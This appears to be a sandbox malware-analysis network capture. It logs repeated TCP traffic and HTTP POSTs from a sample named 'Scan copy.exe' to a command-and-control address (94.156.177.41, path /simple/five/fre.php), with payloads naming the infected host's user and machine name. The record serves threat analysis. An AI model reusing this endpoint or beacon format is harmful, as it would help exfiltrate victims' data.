                            Nov 28, 2024 09:15:34.019035101 CET804990394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:34.019143105 CET4990380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:34.019172907 CET804990394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:34.019222975 CET4990380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:34.139339924 CET804990394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:34.165513992 CET4990980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:34.285557985 CET804990994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:34.285693884 CET4990980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:34.287918091 CET4990980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:34.407824039 CET804990994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:34.408050060 CET4990980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:34.528007030 CET804990994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:35.875049114 CET804990994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:35.875184059 CET804990994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:35.875260115 CET4990980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:35.875260115 CET4990980192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:35.995187044 CET804990994.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:36.025485992 CET4991480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:36.145463943 CET804991494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:36.145639896 CET4991480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:36.147876024 CET4991480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:36.267879009 CET804991494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:36.267971039 CET4991480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:36.387939930 CET804991494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:37.777539968 CET804991494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:37.777601004 CET804991494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:37.777781963 CET4991480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:37.777781963 CET4991480192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:37.897834063 CET804991494.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:37.913727999 CET4991880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:38.033776999 CET804991894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:38.033865929 CET4991880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:38.036020994 CET4991880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:38.156059027 CET804991894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:38.156179905 CET4991880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:38.276240110 CET804991894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:39.432101011 CET804991894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:39.432138920 CET804991894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:39.432276964 CET4991880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:39.432599068 CET4991880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:39.552495003 CET804991894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:39.574244022 CET4992280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:39.694252968 CET804992294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:39.694361925 CET4992280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:39.696580887 CET4992280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:39.816497087 CET804992294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:39.816582918 CET4992280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:39.936657906 CET804992294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:41.183394909 CET804992294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:41.183420897 CET804992294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:41.183582067 CET4992280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:41.209433079 CET4992280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:41.329580069 CET804992294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:41.351775885 CET4992880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:41.471641064 CET804992894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:41.471754074 CET4992880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:41.477293968 CET4992880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:41.597281933 CET804992894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:41.597338915 CET4992880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:41.719494104 CET804992894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:42.916821957 CET804992894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:42.916866064 CET804992894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:42.916927099 CET4992880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:42.917257071 CET4992880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:43.036875963 CET804992894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:43.052184105 CET4993080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:43.172158957 CET804993094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:43.172306061 CET4993080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:43.174424887 CET4993080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:43.294547081 CET804993094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:43.294625998 CET4993080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:43.414654970 CET804993094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:44.758248091 CET804993094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:44.758426905 CET4993080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:44.758502960 CET804993094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:44.758548975 CET4993080192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:44.878631115 CET804993094.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:44.898148060 CET4993580192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:45.018202066 CET804993594.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:45.018450975 CET4993580192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:45.020473957 CET4993580192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:45.140402079 CET804993594.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:45.140467882 CET4993580192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:45.261513948 CET804993594.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:46.605042934 CET804993594.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:46.605174065 CET4993580192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:46.605211973 CET804993594.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:46.605272055 CET4993580192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:46.725331068 CET804993594.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:46.745294094 CET4993880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:46.865371943 CET804993894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:46.865611076 CET4993880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:46.867748022 CET4993880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:46.988840103 CET804993894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:46.988970041 CET4993880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:47.108963966 CET804993894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:48.264616966 CET804993894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:48.264719009 CET804993894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:48.264914036 CET4993880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:48.264914989 CET4993880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:48.384985924 CET804993894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:48.421516895 CET4994380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:48.541511059 CET804994394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:48.541589022 CET4994380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:48.543951988 CET4994380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:48.663881063 CET804994394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:48.663942099 CET4994380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:48.783957005 CET804994394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:50.179811001 CET804994394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:50.179949999 CET4994380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:50.180033922 CET804994394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:50.180085897 CET4994380192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:50.300740004 CET804994394.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:50.319926023 CET4994880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:50.439974070 CET804994894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:50.440241098 CET4994880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:50.502160072 CET4994880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:50.622231960 CET804994894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:50.622383118 CET4994880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:50.742433071 CET804994894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:51.927736044 CET804994894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:51.927793980 CET804994894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:51.927974939 CET4994880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:51.927974939 CET4994880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:52.047991037 CET804994894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:52.084002018 CET4995280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:52.204966068 CET804995294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:52.206363916 CET4995280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:52.208524942 CET4995280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:52.328516006 CET804995294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:52.328756094 CET4995280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:52.448677063 CET804995294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:53.836759090 CET804995294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:53.836819887 CET804995294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:53.838779926 CET4995280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:53.838974953 CET4995280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:53.958940983 CET804995294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:53.975395918 CET4995880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:54.095390081 CET804995894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:54.095547915 CET4995880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:54.097814083 CET4995880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:54.217735052 CET804995894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:54.218254089 CET4995880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:54.338226080 CET804995894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:55.577980042 CET804995894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:55.578072071 CET804995894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:55.578098059 CET4995880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:55.578110933 CET4995880192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:55.697992086 CET804995894.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:55.742435932 CET4996280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:55.862488985 CET804996294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:55.862715006 CET4996280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:55.864881039 CET4996280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:55.984829903 CET804996294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:55.988729954 CET4996280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:56.108715057 CET804996294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:57.305187941 CET804996294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:57.305398941 CET804996294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:57.305447102 CET4996280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:57.308156013 CET4996280192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:57.425468922 CET804996294.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:57.444180965 CET4996680192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:57.564213991 CET804996694.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:57.564299107 CET4996680192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:57.566478014 CET4996680192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:57.686556101 CET804996694.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:57.686634064 CET4996680192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:57.808161974 CET804996694.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:59.101942062 CET804996694.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:59.101983070 CET804996694.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:59.102042913 CET4996680192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:59.102089882 CET4996680192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:59.222001076 CET804996694.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:59.244219065 CET4997180192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:59.364300013 CET804997194.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:59.364443064 CET4997180192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:59.366906881 CET4997180192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:59.487037897 CET804997194.156.177.41192.168.2.7
                            Nov 28, 2024 09:15:59.487158060 CET4997180192.168.2.794.156.177.41
                            Nov 28, 2024 09:15:59.607271910 CET804997194.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:00.808506012 CET804997194.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:00.808543921 CET804997194.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:00.808598042 CET4997180192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:00.808645964 CET4997180192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:00.928601980 CET804997194.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:00.946378946 CET4997680192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:01.066474915 CET804997694.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:01.066684008 CET4997680192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:01.069273949 CET4997680192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:01.189213037 CET804997694.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:01.189356089 CET4997680192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:01.309462070 CET804997694.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:02.507936954 CET804997694.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:02.507955074 CET804997694.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:02.508043051 CET4997680192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:02.508084059 CET4997680192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:02.628084898 CET804997694.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:02.647028923 CET4998280192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:02.767209053 CET804998294.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:02.767339945 CET4998280192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:02.769401073 CET4998280192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:02.889365911 CET804998294.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:02.889650106 CET4998280192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:03.010974884 CET804998294.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:04.174340963 CET804998294.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:04.174396038 CET804998294.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:04.174439907 CET4998280192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:04.174479008 CET4998280192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:04.294475079 CET804998294.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:04.340342999 CET4998780192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:04.460654020 CET804998794.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:04.464869022 CET4998780192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:04.467031956 CET4998780192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:04.587042093 CET804998794.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:04.587141991 CET4998780192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:04.707226038 CET804998794.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:06.009777069 CET804998794.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:06.009910107 CET4998780192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:06.009932041 CET804998794.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:06.009978056 CET4998780192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:06.130177975 CET804998794.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:06.144771099 CET4999080192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:06.266752005 CET804999094.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:06.266863108 CET4999080192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:06.268991947 CET4999080192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:06.388945103 CET804999094.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:06.389002085 CET4999080192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:06.508910894 CET804999094.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:07.709157944 CET804999094.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:07.709243059 CET804999094.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:07.709409952 CET4999080192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:07.709409952 CET4999080192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:07.829416990 CET804999094.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:07.853251934 CET4999580192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:07.973280907 CET804999594.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:07.973498106 CET4999580192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:07.975691080 CET4999580192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:08.095727921 CET804999594.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:08.095796108 CET4999580192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:08.215810061 CET804999594.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:09.414546013 CET804999594.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:09.414577961 CET804999594.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:09.414885998 CET4999580192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:09.414885998 CET4999580192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:09.534938097 CET804999594.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:09.555291891 CET5000080192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:09.675334930 CET805000094.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:09.675451994 CET5000080192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:09.677831888 CET5000080192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:09.797740936 CET805000094.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:09.797792912 CET5000080192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:09.917742014 CET805000094.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:11.218923092 CET805000094.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:11.218976974 CET805000094.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:11.219183922 CET5000080192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:11.219247103 CET5000080192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:11.339205027 CET805000094.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:11.371793985 CET5000480192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:11.491756916 CET805000494.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:11.491847992 CET5000480192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:11.494457006 CET5000480192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:11.614347935 CET805000494.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:11.614597082 CET5000480192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:11.734586954 CET805000494.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:13.036164045 CET805000494.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:13.036325932 CET805000494.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:13.036489010 CET5000480192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:13.049462080 CET5000480192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:13.169394016 CET805000494.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:13.199317932 CET5000980192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:13.319334984 CET805000994.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:13.322861910 CET5000980192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:13.324951887 CET5000980192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:13.445076942 CET805000994.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:13.446835995 CET5000980192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:13.566925049 CET805000994.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:14.719775915 CET805000994.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:14.719919920 CET805000994.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:14.719923019 CET5000980192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:14.720005989 CET5000980192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:14.840153933 CET805000994.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:14.868438005 CET5001280192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:14.988678932 CET805001294.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:14.988894939 CET5001280192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:14.991100073 CET5001280192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:15.111128092 CET805001294.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:15.111181974 CET5001280192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:15.231086016 CET805001294.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:16.432226896 CET805001294.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:16.432446003 CET805001294.156.177.41192.168.2.7
                            Nov 28, 2024 09:16:16.432518959 CET5001280192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:16.432564974 CET5001280192.168.2.794.156.177.41
                            Nov 28, 2024 09:16:16.552479982 CET805001294.156.177.41192.168.2.7
                            • 94.156.177.41
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.74970394.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:14.976162910 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 192
                            Connection: close
                            Nov 28, 2024 09:14:15.096111059 CET192OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: 'ckav.rufrontdesk841675FRONTDESK-PCk0FDD42EE188E931437F4FBE2CFEjoC
                            Nov 28, 2024 09:14:16.412965059 CET185INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:16 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.74970594.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:16.735785007 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 192
                            Connection: close
                            Nov 28, 2024 09:14:16.856131077 CET192OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: 'ckav.rufrontdesk841675FRONTDESK-PC+0FDD42EE188E931437F4FBE2C1aESK
                            Nov 28, 2024 09:14:18.371232033 CET185INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:18 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.74970794.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:18.577112913 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:18.697510958 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:19.966336966 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:19 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.74970994.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:14:20.231441021 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:14:20.351381063 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:14:21.741441965 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:14:21 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.74971094.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
